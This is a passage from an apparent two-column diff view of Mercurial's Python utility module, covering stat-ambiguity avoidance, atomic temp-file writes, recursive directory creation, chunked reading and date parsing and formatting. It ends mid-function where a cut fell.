1704 def isambig(self, old):
1701 """Examine whether new (= self) stat is ambiguous against old one
1705 """Examine whether new (= self) stat is ambiguous against old one
1702
1706
1703 "S[N]" below means stat of a file at N-th change:
1707 "S[N]" below means stat of a file at N-th change:
1704
1708
1705 - S[n-1].ctime < S[n].ctime: can detect change of a file
1709 - S[n-1].ctime < S[n].ctime: can detect change of a file
1706 - S[n-1].ctime == S[n].ctime
1710 - S[n-1].ctime == S[n].ctime
1707 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1711 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1708 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1712 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1709 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1713 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1710 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1714 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1711
1715
1712 Case (*2) above means that a file was changed twice or more at
1716 Case (*2) above means that a file was changed twice or more at
1713 same time in sec (= S[n-1].ctime), and comparison of timestamp
1717 same time in sec (= S[n-1].ctime), and comparison of timestamp
1714 is ambiguous.
1718 is ambiguous.
1715
1719
1716 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1720 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1717 timestamp is ambiguous".
1721 timestamp is ambiguous".
1718
1722
1719 But advancing mtime only in case (*2) doesn't work as
1723 But advancing mtime only in case (*2) doesn't work as
1720 expected, because naturally advanced S[n].mtime in case (*1)
1724 expected, because naturally advanced S[n].mtime in case (*1)
1721 might be equal to manually advanced S[n-1 or earlier].mtime.
1725 might be equal to manually advanced S[n-1 or earlier].mtime.
1722
1726
1723 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1727 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1724 treated as ambiguous regardless of mtime, to avoid overlooking
1728 treated as ambiguous regardless of mtime, to avoid overlooking
1725 by confliction between such mtime.
1729 by confliction between such mtime.
1726
1730
1727 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1731 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1728 S[n].mtime", even if size of a file isn't changed.
1732 S[n].mtime", even if size of a file isn't changed.
1729 """
1733 """
1730 try:
1734 try:
1731 return (self.stat.st_ctime == old.stat.st_ctime)
1735 return (self.stat.st_ctime == old.stat.st_ctime)
1732 except AttributeError:
1736 except AttributeError:
1733 return False
1737 return False
1734
1738
1735 def avoidambig(self, path, old):
1739 def avoidambig(self, path, old):
1736 """Change file stat of specified path to avoid ambiguity
1740 """Change file stat of specified path to avoid ambiguity
1737
1741
1738 'old' should be previous filestat of 'path'.
1742 'old' should be previous filestat of 'path'.
1739
1743
1740 This skips avoiding ambiguity, if a process doesn't have
1744 This skips avoiding ambiguity, if a process doesn't have
1741 appropriate privileges for 'path'. This returns False in this
1745 appropriate privileges for 'path'. This returns False in this
1742 case.
1746 case.
1743
1747
1744 Otherwise, this returns True, as "ambiguity is avoided".
1748 Otherwise, this returns True, as "ambiguity is avoided".
1745 """
1749 """
1746 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1750 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1747 try:
1751 try:
1748 os.utime(path, (advanced, advanced))
1752 os.utime(path, (advanced, advanced))
1749 except OSError as inst:
1753 except OSError as inst:
1750 if inst.errno == errno.EPERM:
1754 if inst.errno == errno.EPERM:
1751 # utime() on the file created by another user causes EPERM,
1755 # utime() on the file created by another user causes EPERM,
1752 # if a process doesn't have appropriate privileges
1756 # if a process doesn't have appropriate privileges
1753 return False
1757 return False
1754 raise
1758 raise
1755 return True
1759 return True
1756
1760
1757 def __ne__(self, other):
1761 def __ne__(self, other):
1758 return not self == other
1762 return not self == other
1759
1763
1760 class atomictempfile(object):
1764 class atomictempfile(object):
1761 '''writable file object that atomically updates a file
1765 '''writable file object that atomically updates a file
1762
1766
1763 All writes will go to a temporary copy of the original file. Call
1767 All writes will go to a temporary copy of the original file. Call
1764 close() when you are done writing, and atomictempfile will rename
1768 close() when you are done writing, and atomictempfile will rename
1765 the temporary copy to the original name, making the changes
1769 the temporary copy to the original name, making the changes
1766 visible. If the object is destroyed without being closed, all your
1770 visible. If the object is destroyed without being closed, all your
1767 writes are discarded.
1771 writes are discarded.
1768
1772
1769 checkambig argument of constructor is used with filestat, and is
1773 checkambig argument of constructor is used with filestat, and is
1770 useful only if target file is guarded by any lock (e.g. repo.lock
1774 useful only if target file is guarded by any lock (e.g. repo.lock
1771 or repo.wlock).
1775 or repo.wlock).
1772 '''
1776 '''
1773 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1777 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1774 self.__name = name # permanent name
1778 self.__name = name # permanent name
1775 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1779 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1776 createmode=createmode)
1780 createmode=createmode)
1777 self._fp = posixfile(self._tempname, mode)
1781 self._fp = posixfile(self._tempname, mode)
1778 self._checkambig = checkambig
1782 self._checkambig = checkambig
1779
1783
1780 # delegated methods
1784 # delegated methods
1781 self.read = self._fp.read
1785 self.read = self._fp.read
1782 self.write = self._fp.write
1786 self.write = self._fp.write
1783 self.seek = self._fp.seek
1787 self.seek = self._fp.seek
1784 self.tell = self._fp.tell
1788 self.tell = self._fp.tell
1785 self.fileno = self._fp.fileno
1789 self.fileno = self._fp.fileno
1786
1790
1787 def close(self):
1791 def close(self):
1788 if not self._fp.closed:
1792 if not self._fp.closed:
1789 self._fp.close()
1793 self._fp.close()
1790 filename = localpath(self.__name)
1794 filename = localpath(self.__name)
1791 oldstat = self._checkambig and filestat.frompath(filename)
1795 oldstat = self._checkambig and filestat.frompath(filename)
1792 if oldstat and oldstat.stat:
1796 if oldstat and oldstat.stat:
1793 rename(self._tempname, filename)
1797 rename(self._tempname, filename)
1794 newstat = filestat.frompath(filename)
1798 newstat = filestat.frompath(filename)
1795 if newstat.isambig(oldstat):
1799 if newstat.isambig(oldstat):
1796 # stat of changed file is ambiguous to original one
1800 # stat of changed file is ambiguous to original one
1797 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1801 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1798 os.utime(filename, (advanced, advanced))
1802 os.utime(filename, (advanced, advanced))
1799 else:
1803 else:
1800 rename(self._tempname, filename)
1804 rename(self._tempname, filename)
1801
1805
1802 def discard(self):
1806 def discard(self):
1803 if not self._fp.closed:
1807 if not self._fp.closed:
1804 try:
1808 try:
1805 os.unlink(self._tempname)
1809 os.unlink(self._tempname)
1806 except OSError:
1810 except OSError:
1807 pass
1811 pass
1808 self._fp.close()
1812 self._fp.close()
1809
1813
1810 def __del__(self):
1814 def __del__(self):
1811 if safehasattr(self, '_fp'): # constructor actually did something
1815 if safehasattr(self, '_fp'): # constructor actually did something
1812 self.discard()
1816 self.discard()
1813
1817
1814 def __enter__(self):
1818 def __enter__(self):
1815 return self
1819 return self
1816
1820
1817 def __exit__(self, exctype, excvalue, traceback):
1821 def __exit__(self, exctype, excvalue, traceback):
1818 if exctype is not None:
1822 if exctype is not None:
1819 self.discard()
1823 self.discard()
1820 else:
1824 else:
1821 self.close()
1825 self.close()
1822
1826
1823 def unlinkpath(f, ignoremissing=False):
1827 def unlinkpath(f, ignoremissing=False):
1824 """unlink and remove the directory if it is empty"""
1828 """unlink and remove the directory if it is empty"""
1825 if ignoremissing:
1829 if ignoremissing:
1826 tryunlink(f)
1830 tryunlink(f)
1827 else:
1831 else:
1828 unlink(f)
1832 unlink(f)
1829 # try removing directories that might now be empty
1833 # try removing directories that might now be empty
1830 try:
1834 try:
1831 removedirs(os.path.dirname(f))
1835 removedirs(os.path.dirname(f))
1832 except OSError:
1836 except OSError:
1833 pass
1837 pass
1834
1838
1835 def tryunlink(f):
1839 def tryunlink(f):
1836 """Attempt to remove a file, ignoring ENOENT errors."""
1840 """Attempt to remove a file, ignoring ENOENT errors."""
1837 try:
1841 try:
1838 unlink(f)
1842 unlink(f)
1839 except OSError as e:
1843 except OSError as e:
1840 if e.errno != errno.ENOENT:
1844 if e.errno != errno.ENOENT:
1841 raise
1845 raise
1842
1846
1843 def makedirs(name, mode=None, notindexed=False):
1847 def makedirs(name, mode=None, notindexed=False):
1844 """recursive directory creation with parent mode inheritance
1848 """recursive directory creation with parent mode inheritance
1845
1849
1846 Newly created directories are marked as "not to be indexed by
1850 Newly created directories are marked as "not to be indexed by
1847 the content indexing service", if ``notindexed`` is specified
1851 the content indexing service", if ``notindexed`` is specified
1848 for "write" mode access.
1852 for "write" mode access.
1849 """
1853 """
1850 try:
1854 try:
1851 makedir(name, notindexed)
1855 makedir(name, notindexed)
1852 except OSError as err:
1856 except OSError as err:
1853 if err.errno == errno.EEXIST:
1857 if err.errno == errno.EEXIST:
1854 return
1858 return
1855 if err.errno != errno.ENOENT or not name:
1859 if err.errno != errno.ENOENT or not name:
1856 raise
1860 raise
1857 parent = os.path.dirname(os.path.abspath(name))
1861 parent = os.path.dirname(os.path.abspath(name))
1858 if parent == name:
1862 if parent == name:
1859 raise
1863 raise
1860 makedirs(parent, mode, notindexed)
1864 makedirs(parent, mode, notindexed)
1861 try:
1865 try:
1862 makedir(name, notindexed)
1866 makedir(name, notindexed)
1863 except OSError as err:
1867 except OSError as err:
1864 # Catch EEXIST to handle races
1868 # Catch EEXIST to handle races
1865 if err.errno == errno.EEXIST:
1869 if err.errno == errno.EEXIST:
1866 return
1870 return
1867 raise
1871 raise
1868 if mode is not None:
1872 if mode is not None:
1869 os.chmod(name, mode)
1873 os.chmod(name, mode)
1870
1874
1871 def readfile(path):
1875 def readfile(path):
1872 with open(path, 'rb') as fp:
1876 with open(path, 'rb') as fp:
1873 return fp.read()
1877 return fp.read()
1874
1878
1875 def writefile(path, text):
1879 def writefile(path, text):
1876 with open(path, 'wb') as fp:
1880 with open(path, 'wb') as fp:
1877 fp.write(text)
1881 fp.write(text)
1878
1882
1879 def appendfile(path, text):
1883 def appendfile(path, text):
1880 with open(path, 'ab') as fp:
1884 with open(path, 'ab') as fp:
1881 fp.write(text)
1885 fp.write(text)
1882
1886
1883 class chunkbuffer(object):
1887 class chunkbuffer(object):
1884 """Allow arbitrary sized chunks of data to be efficiently read from an
1888 """Allow arbitrary sized chunks of data to be efficiently read from an
1885 iterator over chunks of arbitrary size."""
1889 iterator over chunks of arbitrary size."""
1886
1890
1887 def __init__(self, in_iter):
1891 def __init__(self, in_iter):
1888 """in_iter is the iterator that's iterating over the input chunks."""
1892 """in_iter is the iterator that's iterating over the input chunks."""
1889 def splitbig(chunks):
1893 def splitbig(chunks):
1890 for chunk in chunks:
1894 for chunk in chunks:
1891 if len(chunk) > 2**20:
1895 if len(chunk) > 2**20:
1892 pos = 0
1896 pos = 0
1893 while pos < len(chunk):
1897 while pos < len(chunk):
1894 end = pos + 2 ** 18
1898 end = pos + 2 ** 18
1895 yield chunk[pos:end]
1899 yield chunk[pos:end]
1896 pos = end
1900 pos = end
1897 else:
1901 else:
1898 yield chunk
1902 yield chunk
1899 self.iter = splitbig(in_iter)
1903 self.iter = splitbig(in_iter)
1900 self._queue = collections.deque()
1904 self._queue = collections.deque()
1901 self._chunkoffset = 0
1905 self._chunkoffset = 0
1902
1906
1903 def read(self, l=None):
1907 def read(self, l=None):
1904 """Read L bytes of data from the iterator of chunks of data.
1908 """Read L bytes of data from the iterator of chunks of data.
1905 Returns less than L bytes if the iterator runs dry.
1909 Returns less than L bytes if the iterator runs dry.
1906
1910
1907 If size parameter is omitted, read everything"""
1911 If size parameter is omitted, read everything"""
1908 if l is None:
1912 if l is None:
1909 return ''.join(self.iter)
1913 return ''.join(self.iter)
1910
1914
1911 left = l
1915 left = l
1912 buf = []
1916 buf = []
1913 queue = self._queue
1917 queue = self._queue
1914 while left > 0:
1918 while left > 0:
1915 # refill the queue
1919 # refill the queue
1916 if not queue:
1920 if not queue:
1917 target = 2**18
1921 target = 2**18
1918 for chunk in self.iter:
1922 for chunk in self.iter:
1919 queue.append(chunk)
1923 queue.append(chunk)
1920 target -= len(chunk)
1924 target -= len(chunk)
1921 if target <= 0:
1925 if target <= 0:
1922 break
1926 break
1923 if not queue:
1927 if not queue:
1924 break
1928 break
1925
1929
1926 # The easy way to do this would be to queue.popleft(), modify the
1930 # The easy way to do this would be to queue.popleft(), modify the
1927 # chunk (if necessary), then queue.appendleft(). However, for cases
1931 # chunk (if necessary), then queue.appendleft(). However, for cases
1928 # where we read partial chunk content, this incurs 2 dequeue
1932 # where we read partial chunk content, this incurs 2 dequeue
1929 # mutations and creates a new str for the remaining chunk in the
1933 # mutations and creates a new str for the remaining chunk in the
1930 # queue. Our code below avoids this overhead.
1934 # queue. Our code below avoids this overhead.
1931
1935
1932 chunk = queue[0]
1936 chunk = queue[0]
1933 chunkl = len(chunk)
1937 chunkl = len(chunk)
1934 offset = self._chunkoffset
1938 offset = self._chunkoffset
1935
1939
1936 # Use full chunk.
1940 # Use full chunk.
1937 if offset == 0 and left >= chunkl:
1941 if offset == 0 and left >= chunkl:
1938 left -= chunkl
1942 left -= chunkl
1939 queue.popleft()
1943 queue.popleft()
1940 buf.append(chunk)
1944 buf.append(chunk)
1941 # self._chunkoffset remains at 0.
1945 # self._chunkoffset remains at 0.
1942 continue
1946 continue
1943
1947
1944 chunkremaining = chunkl - offset
1948 chunkremaining = chunkl - offset
1945
1949
1946 # Use all of unconsumed part of chunk.
1950 # Use all of unconsumed part of chunk.
1947 if left >= chunkremaining:
1951 if left >= chunkremaining:
1948 left -= chunkremaining
1952 left -= chunkremaining
1949 queue.popleft()
1953 queue.popleft()
1950 # offset == 0 is enabled by block above, so this won't merely
1954 # offset == 0 is enabled by block above, so this won't merely
1951 # copy via ``chunk[0:]``.
1955 # copy via ``chunk[0:]``.
1952 buf.append(chunk[offset:])
1956 buf.append(chunk[offset:])
1953 self._chunkoffset = 0
1957 self._chunkoffset = 0
1954
1958
1955 # Partial chunk needed.
1959 # Partial chunk needed.
1956 else:
1960 else:
1957 buf.append(chunk[offset:offset + left])
1961 buf.append(chunk[offset:offset + left])
1958 self._chunkoffset += left
1962 self._chunkoffset += left
1959 left -= chunkremaining
1963 left -= chunkremaining
1960
1964
1961 return ''.join(buf)
1965 return ''.join(buf)
1962
1966
1963 def filechunkiter(f, size=131072, limit=None):
1967 def filechunkiter(f, size=131072, limit=None):
1964 """Create a generator that produces the data in the file size
1968 """Create a generator that produces the data in the file size
1965 (default 131072) bytes at a time, up to optional limit (default is
1969 (default 131072) bytes at a time, up to optional limit (default is
1966 to read all data). Chunks may be less than size bytes if the
1970 to read all data). Chunks may be less than size bytes if the
1967 chunk is the last chunk in the file, or the file is a socket or
1971 chunk is the last chunk in the file, or the file is a socket or
1968 some other type of file that sometimes reads less data than is
1972 some other type of file that sometimes reads less data than is
1969 requested."""
1973 requested."""
1970 assert size >= 0
1974 assert size >= 0
1971 assert limit is None or limit >= 0
1975 assert limit is None or limit >= 0
1972 while True:
1976 while True:
1973 if limit is None:
1977 if limit is None:
1974 nbytes = size
1978 nbytes = size
1975 else:
1979 else:
1976 nbytes = min(limit, size)
1980 nbytes = min(limit, size)
1977 s = nbytes and f.read(nbytes)
1981 s = nbytes and f.read(nbytes)
1978 if not s:
1982 if not s:
1979 break
1983 break
1980 if limit:
1984 if limit:
1981 limit -= len(s)
1985 limit -= len(s)
1982 yield s
1986 yield s
1983
1987
1984 class cappedreader(object):
1988 class cappedreader(object):
1985 """A file object proxy that allows reading up to N bytes.
1989 """A file object proxy that allows reading up to N bytes.
1986
1990
1987 Given a source file object, instances of this type allow reading up to
1991 Given a source file object, instances of this type allow reading up to
1988 N bytes from that source file object. Attempts to read past the allowed
1992 N bytes from that source file object. Attempts to read past the allowed
1989 limit are treated as EOF.
1993 limit are treated as EOF.
1990
1994
1991 It is assumed that I/O is not performed on the original file object
1995 It is assumed that I/O is not performed on the original file object
1992 in addition to I/O that is performed by this instance. If there is,
1996 in addition to I/O that is performed by this instance. If there is,
1993 state tracking will get out of sync and unexpected results will ensue.
1997 state tracking will get out of sync and unexpected results will ensue.
1994 """
1998 """
1995 def __init__(self, fh, limit):
1999 def __init__(self, fh, limit):
1996 """Allow reading up to <limit> bytes from <fh>."""
2000 """Allow reading up to <limit> bytes from <fh>."""
1997 self._fh = fh
2001 self._fh = fh
1998 self._left = limit
2002 self._left = limit
1999
2003
2000 def read(self, n=-1):
2004 def read(self, n=-1):
2001 if not self._left:
2005 if not self._left:
2002 return b''
2006 return b''
2003
2007
2004 if n < 0:
2008 if n < 0:
2005 n = self._left
2009 n = self._left
2006
2010
2007 data = self._fh.read(min(n, self._left))
2011 data = self._fh.read(min(n, self._left))
2008 self._left -= len(data)
2012 self._left -= len(data)
2009 assert self._left >= 0
2013 assert self._left >= 0
2010
2014
2011 return data
2015 return data
2012
2016
2013 def makedate(timestamp=None):
2017 def makedate(timestamp=None):
2014 '''Return a unix timestamp (or the current time) as a (unixtime,
2018 '''Return a unix timestamp (or the current time) as a (unixtime,
2015 offset) tuple based off the local timezone.'''
2019 offset) tuple based off the local timezone.'''
2016 if timestamp is None:
2020 if timestamp is None:
2017 timestamp = time.time()
2021 timestamp = time.time()
2018 if timestamp < 0:
2022 if timestamp < 0:
2019 hint = _("check your clock")
2023 hint = _("check your clock")
2020 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
2024 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
2021 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
2025 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
2022 datetime.datetime.fromtimestamp(timestamp))
2026 datetime.datetime.fromtimestamp(timestamp))
2023 tz = delta.days * 86400 + delta.seconds
2027 tz = delta.days * 86400 + delta.seconds
2024 return timestamp, tz
2028 return timestamp, tz
2025
2029
2026 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
2030 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
2027 """represent a (unixtime, offset) tuple as a localized time.
2031 """represent a (unixtime, offset) tuple as a localized time.
2028 unixtime is seconds since the epoch, and offset is the time zone's
2032 unixtime is seconds since the epoch, and offset is the time zone's
2029 number of seconds away from UTC.
2033 number of seconds away from UTC.
2030
2034
2031 >>> datestr((0, 0))
2035 >>> datestr((0, 0))
2032 'Thu Jan 01 00:00:00 1970 +0000'
2036 'Thu Jan 01 00:00:00 1970 +0000'
2033 >>> datestr((42, 0))
2037 >>> datestr((42, 0))
2034 'Thu Jan 01 00:00:42 1970 +0000'
2038 'Thu Jan 01 00:00:42 1970 +0000'
2035 >>> datestr((-42, 0))
2039 >>> datestr((-42, 0))
2036 'Wed Dec 31 23:59:18 1969 +0000'
2040 'Wed Dec 31 23:59:18 1969 +0000'
2037 >>> datestr((0x7fffffff, 0))
2041 >>> datestr((0x7fffffff, 0))
2038 'Tue Jan 19 03:14:07 2038 +0000'
2042 'Tue Jan 19 03:14:07 2038 +0000'
2039 >>> datestr((-0x80000000, 0))
2043 >>> datestr((-0x80000000, 0))
2040 'Fri Dec 13 20:45:52 1901 +0000'
2044 'Fri Dec 13 20:45:52 1901 +0000'
2041 """
2045 """
2042 t, tz = date or makedate()
2046 t, tz = date or makedate()
2043 if "%1" in format or "%2" in format or "%z" in format:
2047 if "%1" in format or "%2" in format or "%z" in format:
2044 sign = (tz > 0) and "-" or "+"
2048 sign = (tz > 0) and "-" or "+"
2045 minutes = abs(tz) // 60
2049 minutes = abs(tz) // 60
2046 q, r = divmod(minutes, 60)
2050 q, r = divmod(minutes, 60)
2047 format = format.replace("%z", "%1%2")
2051 format = format.replace("%z", "%1%2")
2048 format = format.replace("%1", "%c%02d" % (sign, q))
2052 format = format.replace("%1", "%c%02d" % (sign, q))
2049 format = format.replace("%2", "%02d" % r)
2053 format = format.replace("%2", "%02d" % r)
2050 d = t - tz
2054 d = t - tz
2051 if d > 0x7fffffff:
2055 if d > 0x7fffffff:
2052 d = 0x7fffffff
2056 d = 0x7fffffff
2053 elif d < -0x80000000:
2057 elif d < -0x80000000:
2054 d = -0x80000000
2058 d = -0x80000000
2055 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
2059 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
2056 # because they use the gmtime() system call which is buggy on Windows
2060 # because they use the gmtime() system call which is buggy on Windows
2057 # for negative values.
2061 # for negative values.
2058 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
2062 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
2059 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
2063 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
2060 return s
2064 return s
2061
2065
2062 def shortdate(date=None):
2066 def shortdate(date=None):
2063 """turn (timestamp, tzoff) tuple into iso 8631 date."""
2067 """turn (timestamp, tzoff) tuple into iso 8631 date."""
2064 return datestr(date, format='%Y-%m-%d')
2068 return datestr(date, format='%Y-%m-%d')
2065
2069
2066 def parsetimezone(s):
2070 def parsetimezone(s):
2067 """find a trailing timezone, if any, in string, and return a
2071 """find a trailing timezone, if any, in string, and return a
2068 (offset, remainder) pair"""
2072 (offset, remainder) pair"""
2069
2073
2070 if s.endswith("GMT") or s.endswith("UTC"):
2074 if s.endswith("GMT") or s.endswith("UTC"):
2071 return 0, s[:-3].rstrip()
2075 return 0, s[:-3].rstrip()
2072
2076
2073 # Unix-style timezones [+-]hhmm
2077 # Unix-style timezones [+-]hhmm
2074 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2078 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2075 sign = (s[-5] == "+") and 1 or -1
2079 sign = (s[-5] == "+") and 1 or -1
2076 hours = int(s[-4:-2])
2080 hours = int(s[-4:-2])
2077 minutes = int(s[-2:])
2081 minutes = int(s[-2:])
2078 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2082 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2079
2083
2080 # ISO8601 trailing Z
2084 # ISO8601 trailing Z
2081 if s.endswith("Z") and s[-2:-1].isdigit():
2085 if s.endswith("Z") and s[-2:-1].isdigit():
2082 return 0, s[:-1]
2086 return 0, s[:-1]
2083
2087
2084 # ISO8601-style [+-]hh:mm
2088 # ISO8601-style [+-]hh:mm
2085 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2089 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2086 s[-5:-3].isdigit() and s[-2:].isdigit()):
2090 s[-5:-3].isdigit() and s[-2:].isdigit()):
2087 sign = (s[-6] == "+") and 1 or -1
2091 sign = (s[-6] == "+") and 1 or -1
2088 hours = int(s[-5:-3])
2092 hours = int(s[-5:-3])
2089 minutes = int(s[-2:])
2093 minutes = int(s[-2:])
2090 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2094 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2091
2095
2092 return None, s
2096 return None, s
2093
2097
2094 def strdate(string, format, defaults=None):
2098 def strdate(string, format, defaults=None):
2095 """parse a localized time string and return a (unixtime, offset) tuple.
2099 """parse a localized time string and return a (unixtime, offset) tuple.
2096 if the string cannot be parsed, ValueError is raised."""
2100 if the string cannot be parsed, ValueError is raised."""
2097 if defaults is None:
2101 if defaults is None:
2098 defaults = {}
2102 defaults = {}
2099
2103
2100 # NOTE: unixtime = localunixtime + offset
2104 # NOTE: unixtime = localunixtime + offset
2101 offset, date = parsetimezone(string)
2105 offset, date = parsetimezone(string)
2102
2106
2103 # add missing elements from defaults
2107 # add missing elements from defaults
2104 usenow = False # default to using biased defaults
2108 usenow = False # default to using biased defaults
2105 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2109 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2106 part = pycompat.bytestr(part)
2110 part = pycompat.bytestr(part)
2107 found = [True for p in part if ("%"+p) in format]
2111 found = [True for p in part if ("%"+p) in format]
2108 if not found:
2112 if not found:
2109 date += "@" + defaults[part][usenow]
2113 date += "@" + defaults[part][usenow]
2110 format += "@%" + part[0]
2114 format += "@%" + part[0]
2111 else:
2115 else:
2112 # We've found a specific time element, less specific time
2116 # We've found a specific time element, less specific time
2113 # elements are relative to today
2117 # elements are relative to today
2114 usenow = True
2118 usenow = True
2115
2119
2116 timetuple = time.strptime(encoding.strfromlocal(date),
2120 timetuple = time.strptime(encoding.strfromlocal(date),
2117 encoding.strfromlocal(format))
2121 encoding.strfromlocal(format))
2118 localunixtime = int(calendar.timegm(timetuple))
2122 localunixtime = int(calendar.timegm(timetuple))
2119 if offset is None:
2123 if offset is None:
2120 # local timezone
2124 # local timezone
2121 unixtime = int(time.mktime(timetuple))
2125 unixtime = int(time.mktime(timetuple))
2122 offset = unixtime - localunixtime
2126 offset = unixtime - localunixtime
2123 else:
2127 else:
2124 unixtime = localunixtime + offset
2128 unixtime = localunixtime + offset
2125 return unixtime, offset
2129 return unixtime, offset
2126
2130
2127 def parsedate(date, formats=None, bias=None):
2131 def parsedate(date, formats=None, bias=None):
2128 """parse a localized date/time and return a (unixtime, offset) tuple.
2132 """parse a localized date/time and return a (unixtime, offset) tuple.
2129
2133
2130 The date may be a "unixtime offset" string or in one of the specified
2134 The date may be a "unixtime offset" string or in one of the specified
2131 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2135 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2132
2136
2133 >>> parsedate(b' today ') == parsedate(
2137 >>> parsedate(b' today ') == parsedate(
2134 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2138 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2135 True
2139 True
2136 >>> parsedate(b'yesterday ') == parsedate(
2140 >>> parsedate(b'yesterday ') == parsedate(
2137 ... (datetime.date.today() - datetime.timedelta(days=1)
2141 ... (datetime.date.today() - datetime.timedelta(days=1)
2138 ... ).strftime('%b %d').encode('ascii'))
2142 ... ).strftime('%b %d').encode('ascii'))
2139 True
2143 True
2140 >>> now, tz = makedate()
2144 >>> now, tz = makedate()
2141 >>> strnow, strtz = parsedate(b'now')
2145 >>> strnow, strtz = parsedate(b'now')
2142 >>> (strnow - now) < 1
2146 >>> (strnow - now) < 1
2143 True
2147 True
2144 >>> tz == strtz
2148 >>> tz == strtz
2145 True
2149 True
2146 """
2150 """
2147 if bias is None:
2151 if bias is None:
2148 bias = {}
2152 bias = {}
2149 if not date:
2153 if not date:
2150 return 0, 0
2154 return 0, 0
2151 if isinstance(date, tuple) and len(date) == 2:
2155 if isinstance(date, tuple) and len(date) == 2:
2152 return date
2156 return date
2153 if not formats:
2157 if not formats:
2154 formats = defaultdateformats
2158 formats = defaultdateformats
2155 date = date.strip()
2159 date = date.strip()
2156
2160
2157 if date == 'now' or date == _('now'):
2161 if date == 'now' or date == _('now'):
2158 return makedate()
2162 return makedate()
2159 if date == 'today' or date == _('today'):
2163 if date == 'today' or date == _('today'):
2160 date = datetime.date.today().strftime(r'%b %d')
2164 date = datetime.date.today().strftime(r'%b %d')
2161 date = encoding.strtolocal(date)
2165 date = encoding.strtolocal(date)
2162 elif date == 'yesterday' or date == _('yesterday'):
2166 elif date == 'yesterday' or date == _('yesterday'):
2163 date = (datetime.date.today() -
2167 date = (datetime.date.today() -
2164 datetime.timedelta(days=1)).strftime(r'%b %d')
2168 datetime.timedelta(days=1)).strftime(r'%b %d')
2165 date = encoding.strtolocal(date)
2169 date = encoding.strtolocal(date)
2166
2170
2167 try:
2171 try:
2168 when, offset = map(int, date.split(' '))
2172 when, offset = map(int, date.split(' '))
2169 except ValueError:
2173 except ValueError:
2170 # fill out defaults
2174 # fill out defaults
2171 now = makedate()
2175 now = makedate()
2172 defaults = {}
2176 defaults = {}
2173 for part in ("d", "mb", "yY", "HI", "M", "S"):
2177 for part in ("d", "mb", "yY", "HI", "M", "S"):
2174 # this piece is for rounding the specific end of unknowns
2178 # this piece is for rounding the specific end of unknowns
2175 b = bias.get(part)
2179 b = bias.get(part)
2176 if b is None:
2180 if b is None:
2177 if part[0:1] in "HMS":
2181 if part[0:1] in "HMS":
2178 b = "00"
2182 b = "00"
2179 else:
2183 else:
2180 b = "0"
2184 b = "0"
2181
2185
2182 # this piece is for matching the generic end to today's date
2186 # this piece is for matching the generic end to today's date
2183 n = datestr(now, "%" + part[0:1])
2187 n = datestr(now, "%" + part[0:1])
2184
2188
2185 defaults[part] = (b, n)
2189 defaults[part] = (b, n)
2186
2190
2187 for format in formats:
2191 for format in formats:
2188 try:
2192 try:
2189 when, offset = strdate(date, format, defaults)
2193 when, offset = strdate(date, format, defaults)
2190 except (ValueError, OverflowError):
2194 except (ValueError, OverflowError):
2191 pass
2195 pass
2192 else:
2196 else:
2193 break
2197 break
2194 else:
2198 else:
2195 raise error.ParseError(_('invalid date: %r') % date)
2199 raise error.ParseError(_('invalid date: %r') % date)
2196 # validate explicit (probably user-specified) date and
2200 # validate explicit (probably user-specified) date and
2197 # time zone offset. values must fit in signed 32 bits for
2201 # time zone offset. values must fit in signed 32 bits for
2198 # current 32-bit linux runtimes. timezones go from UTC-12
2202 # current 32-bit linux runtimes. timezones go from UTC-12
2199 # to UTC+14
2203 # to UTC+14
2200 if when < -0x80000000 or when > 0x7fffffff:
2204 if when < -0x80000000 or when > 0x7fffffff:
2201 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2205 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2202 if offset < -50400 or offset > 43200:
